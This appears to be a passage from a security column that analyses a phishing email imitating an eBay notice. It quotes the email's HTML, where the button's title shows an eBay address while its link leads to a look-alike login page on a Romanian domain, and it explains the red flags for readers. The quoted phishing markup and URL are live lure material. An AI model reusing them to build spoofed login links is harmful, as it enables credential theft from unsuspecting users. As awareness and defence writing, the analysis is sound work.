*yamama_r6&qid= * *1470018712& * *redirect=0& * *sspagename= * *ADME:B:AAQ:UK:2 * ******************** * * * * * * * * * Thank you for using eBay http://www.ebay.com/ * * * Learn how you can protect yourself from spoof (fake) emails at: http://pages.ebay.com/education/spooftutorial * This eBay notice was sent to kvnmtchll200@aol.com on behalf of another eBay member through the eBay platform and in accordance with our Privacy Policy. If you would like to receive this email in text format, change your notification preferences. * See our Privacy Policy and User Agreement if you have questions about eBay's communication policies. Privacy Policy: http://pages.ebay.com/help/policies/privacy-policy.html User Agreement: http://pages.ebay.com/help/policies/user-agreement.html * Copyright © 2005 eBay, Inc. All Rights Reserved. Designated trademarks and brands are the property of their respective owners. eBay and ! the eBay logo are registered trademarks or trademarks of eBay, Inc.
Notice anything unusual? Here are a couple of things that sent up red flags for me right away:
Best of all, though, is what happens when you load it up in a browser (I'll include the HTML just so those who are interested can play with it):
[Jimmy] Warning! Certain browsers try to render this!
See attached phishing-source.txt
Take a careful look at that "Submit" button link:
<A title=http://contact.ebay.co.uk/ws/eBayISAPI.dll?M2MContact&item=4589070441& requested=yamama_r6&qid=1470018712&redirect=0&sspagename=ADME:B:AAQ:UK:2 onclick="return ShowLinkWarning()" href="http://www.varzavarzarau.go.ro/ws/ws/arribada/issapidll/ SignIncopartnerId2pUserIdsiteidpageTypepa1i1bshowgifUsingSSLruwwwebaycomppp2errmsgrunameruparam sruproductsidfavoritenavmigrateVisitor/SignIn.html" target=_blank onfiltered="return ShowLinkWarning()">
So, the button is going to pop up a little label saying it's from 'ebay.co.uk'... but it will link to (and your bottom bar will show it as) the 'www.varzavarzarau.go.ro' address. Clicking on it takes you to a look-alike eBay login page... except that there are a couple of those minor quirks, much like the page above, in it.
Naivete costs money - and these days, it happens at Internet speeds.
Oh, to expand on the "XSS" bit: what made it crude is that it was missing one of the critical components of XSS. If you look at the URL in the address bar when the ostensible "eBay loging page" shows up, it's that "www.varzavarzarau.go.ro" one, with a very long tail on it. In an actual XSS attack, once you get that far in the process, there's almost no way to tell - since you're actually at the page where you think you are, but you're "piped through" someone else's machine.